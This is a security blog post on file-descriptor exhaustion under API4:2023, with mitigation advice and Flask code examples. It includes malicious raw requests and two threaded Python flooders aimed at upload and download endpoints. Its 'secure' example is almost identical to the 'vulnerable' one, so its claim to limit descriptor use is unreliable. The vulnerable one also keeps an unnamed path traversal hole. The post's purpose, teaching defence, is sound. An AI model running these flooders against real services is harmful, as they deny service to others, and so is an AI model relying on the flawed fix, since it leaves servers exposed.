Unrestricted Resource Consumption: Managing Maximum Number of File Descriptors | API4:2023 Unrestricted Resource Consumption

Unrestricted Resource Consumption: Managing Maximum Number of File Descriptors

Senad Cavkusic
8 min readMay 21, 2024

I already explained Execution timeouts and Maximum allocable memory. Today, I will continue with the next subject under API4:2023 Unrestricted Resource Consumption, which is managing the maximum number of file descriptors.

Managing Maximum Number of File Descriptors

Understanding Maximum Number of File Descriptors

File descriptors are a fundamental part of operating systems, representing references to open files, network sockets, and other resources. Setting an upper limit on the number of file descriptors that can be allocated is crucial for preventing a single API call from exhausting system resources, which can lead to denial of service (DoS) attacks, performance degradation, and system crashes.

Without a cap on the number of file descriptors, an API request can potentially consume all available file descriptors, leaving none for other processes or users. By enforcing a maximum file descriptor limit, organizations can ensure that their systems remain responsive and stable, even under heavy load or during attacks.

The Risks of Unrestricted File Descriptor Allocation

APIs without well-defined limits on file descriptors are particularly susceptible to DoS attacks. In these scenarios, malicious actors can send requests designed to open a large number of files or network connections, exhausting the server’s resources. This can be especially damaging if the API performs operations that involve numerous file or socket interactions.

For instance, consider an API endpoint that handles file uploads and downloads. If an attacker opens a large number of file handles simultaneously, the server might run out of file descriptors, leading to service unavailability.

In the context of the HTTP request and response communication, a file descriptor is an abstract indicator for accessing files or other input/output resources, such as pipes, sockets, or devices. Each file descriptor is a non-negative integer that uniquely identifies an open file within a process.

Here’s a more detailed explanation of how file descriptors are involved in the given HTTP request:

File Descriptor in HTTP Requests

When a server receives an HTTP request, it performs several operations that involve file descriptors:

  • Network Sockets — The server uses file descriptors to manage network connections. Each open network connection, whether for receiving the request or sending the response, is associated with a file descriptor.
  • File Handling — If the request involves file operations (e.g., uploading or downloading files), the server will use file descriptors to open, read, write, and close files.

Malicious Raw Requests Example:

POST /upload_files HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary= - -boundary
Content-Length: 1000000
- - -boundary
Content-Disposition: form-data; name="file1"; filename="file1.txt"
Content-Type: text/plain
(file content here)
- - -boundary
Content-Disposition: form-data; name="file2"; filename="file2.txt"
Content-Type: text/plain
(file content here)

(repeated many times to exhaust file descriptors)
- - -boundary -

File Descriptors in Action:

Network Connection:

  • When the client sends this request to the server, the server opens a network socket to receive the request. This socket is associated with a file descriptor.

File Upload Handling:

  • As the server processes the multipart/form-data request, it opens each uploaded file using a file descriptor. For example:
  • file1.txt is opened with a file descriptor (e.g., FD 3).
  • file2.txt is opened with a file descriptor (e.g., FD 4).

If the server receives many such requests in quick succession, or if a single request contains many file parts, it will need to open numerous file descriptors to handle the connections and file operations. This can lead to exhaustion of the available file descriptors, resulting in the server’s inability to open new files or accept new connections.

Response Example:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
{
"error": "Too many open files"
}

Python Script Example:

Below is an example of a Python script that an attacker could use to launch such an attack by repeatedly sending HTTP POST requests to the vulnerable endpoint.

import requests
import threading

def send_request(url, files):
try:
response = requests.post(url, files=files)
print(f"Status Code: {response.status_code}")
except Exception as e:
print(f"Request failed: {e}")

def launch_attack(url, num_threads, files):
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=send_request, args=(url, files))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

if __name__ == "__main__":
target_url = "http://example.com/upload_files"
number_of_threads = 1000 # Number of simultaneous requests
files = {'file1': ('file1.txt', 'file content here'), 'file2': ('file2.txt', 'file content here')}

launch_attack(target_url, number_of_threads, files)

Explanation:

Network Connection Descriptors:

  • Each thread opens a network connection to the server, consuming a file descriptor for the socket.

File Handling Descriptors:

  • Each request processed by the server results in the server opening file descriptors for file1.txt and file2.txt.

By sending numerous requests simultaneously, the script can cause the server to exhaust its available file descriptors, leading to errors such as “Too many open files” and potential denial of service.

Real-World Scenario: Cloud Storage API

Consider a cloud storage API that allows users to upload and download files. One significant risk is an operation that opens too many file descriptors, such as handling multiple simultaneous uploads or downloads.

When an operation consumes too many file descriptors, it can cause the server to hit the maximum file descriptor limit, significantly slowing down performance or causing the server to refuse new connections. In extreme cases, the server may run out of file descriptors entirely, leading to crashes and service outages.

For example, if a user attempts to download a large number of files simultaneously and the API tries to open all these files at once, it might exceed the available file descriptors, causing the downloads to fail and the server to become unresponsive.

Malicious Raw Requests Example:

GET /download_file?filename=file1.txt HTTP/1.1
Host: example.com
(repeated many times in quick succession)

Response Example:

HTTP/1.1 500 Internal Server Error
Content-Type: application/json

{
"error": "Too many open files"
}

Python Script Example:

Below is an example of a Python script that an attacker could use to launch such an attack by repeatedly sending HTTP GET requests to the vulnerable endpoint.

import requests
import threading

def send_request(url):
try:
response = requests.get(url)
print(f"Status Code: {response.status_code}")
except Exception as e:
print(f"Request failed: {e}")

def launch_attack(url, num_threads):
threads = []
for _ in range(num_threads):
thread = threading.Thread(target=send_request, args=(url,))
threads.append(thread)
thread.start()

for thread in threads:
thread.join()

if __name__ == "__main__":
target_url = "http://example.com/download_file?filename=file1.txt"
number_of_threads = 1000 # Number of simultaneous requests

launch_attack(target_url, number_of_threads)

Explanation:

Function send_request(url):

  • This function sends a single HTTP GET request to the specified URL using the requests library.
  • It prints the status code of the response or an error message if the request fails.

Function launch_attack(url, num_threads):

  • This function launches the attack by creating multiple threads.
  • Each thread sends an HTTP GET request to the target URL.
  • It takes two parameters: the target URL and the number of threads (simultaneous requests).

Main block:

  • The target_url variable is set to the vulnerable endpoint.
  • The number_of_threads variable defines how many simultaneous requests will be sent (1000 in this example).
  • The launch_attack function is called with the target URL and the number of threads.

This script demonstrates a simple but effective way to exhaust the server’s file descriptors by opening a large number of connections simultaneously. This can lead to resource exhaustion and potentially cause the server to crash or become unresponsive.

Strategies for Effective File Descriptor Management

  • Define File Descriptor Limits — Establish clear limits for the number of file descriptors on a per-request basis. This can be done through configuration settings in your API server or application framework. For example, you can set file descriptor limits in your server’s configuration file to ensure that no single request can open more than a predefined number of file descriptors.
  • Monitor File Descriptor Usage — Implement monitoring tools to track file descriptor usage in real-time. This helps in identifying abnormal usage patterns that might indicate an attack or a bug. Tools like Prometheus, Grafana, or built-in cloud provider monitoring solutions can be employed to keep an eye on file descriptor usage.
  • Graceful Degradation and Error Handling — Ensure that your API can gracefully handle file descriptor allocation errors. This means catching exceptions related to file descriptor limits and responding with appropriate error messages, rather than allowing the server to crash. Implementing a circuit breaker pattern can also help in isolating file descriptor-intensive operations and preventing them from affecting the entire system.
  • Optimize File Handling Operations — Review and optimize the file handling operations in your API. Use efficient file handling techniques and avoid opening too many file descriptors simultaneously. For example, consider using file streaming or chunking to process large files without opening them entirely into memory.
  • Leverage Caching — Use caching mechanisms to reduce the need for repeated file descriptor-intensive operations. By caching the results of expensive operations, you can serve subsequent requests from the cache, reducing file descriptor usage and improving response times.
  • Throttling and Rate Limiting — Implement throttling and rate limiting to control the number of requests hitting your API. By limiting the number of concurrent requests, you can prevent file descriptor exhaustion due to excessive load.
  • Resource Cleanup — Ensure that resources are properly cleaned up after use. This includes closing file handles and network connections. Implementing a robust resource cleanup strategy helps in preventing resource leaks and ensures that file descriptors are freed up for other operations.
  • Stress Testing — Conduct regular stress testing to evaluate how your API handles high file descriptor usage scenarios. Stress testing helps in identifying potential bottlenecks and weaknesses in your file descriptor management strategy. Tools like Apache JMeter or locust.io can be used to simulate high load conditions and assess the performance of your API.

Code Examples

Vulnerable Example:

from flask import Flask, request, jsonify
app = Flask(__name__)
# Vulnerable endpoint that does not limit file descriptor usage
@app.route('/upload_files', methods=['POST'])
def upload_files():
files = request.files.getlist('files')
uploaded_files = []
for file in files:
# Potentially dangerous operation: opening all files at once
with open(f'/uploads/{file.filename}', 'wb') as f:
f.write(file.read())
uploaded_files.append(file.filename)
return jsonify(uploaded_files)
if __name__ == '__main__':
app.run(debug=True)

Secure Example:

from flask import Flask, request, jsonify
from werkzeug.utils import secure_filename
import os
app = Flask(__name__)
UPLOAD_FOLDER = '/uploads'
app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER
# Secure endpoint that limits file descriptor usage
@app.route('/upload_files', methods=['POST'])
def upload_files():
files = request.files.getlist('files')
uploaded_files = []
for file in files:
filename = secure_filename(file.filename)
file_path = os.path.join(app.config['UPLOAD_FOLDER'], filename)
# Open files one at a time to avoid exhausting file descriptors
with open(file_path, 'wb') as f:
f.write(file.read())
uploaded_files.append(filename)
return jsonify(uploaded_files)
if __name__ == '__main__':
app.run(debug=True)

In the secure example, the `upload_files` function processes files one at a time, opening and closing each file handle individually. This approach prevents the server from opening too many file descriptors simultaneously, thereby mitigating the risk of excessive resource consumption.

Conclusion

By addressing the challenge of unrestricted resource consumption through well-defined file descriptor limits, organizations can significantly enhance their API security posture. This not only prevents service disruptions and system instability but also ensures robust and reliable service delivery. As we continue to explore API security, our next discussion will focus on additional strategies to further mitigate this critical vulnerability.

Stay informed and stay safe!

--

--

Senad Cavkusic
Senad Cavkusic

Written by Senad Cavkusic

Master of Cyber Security | Senior Security Researcher | CEH | CPT | CDFE | Certified ISO 27001 Lead Implementer | Developer | linkedin.com/in/senad-cavkusic

No responses yet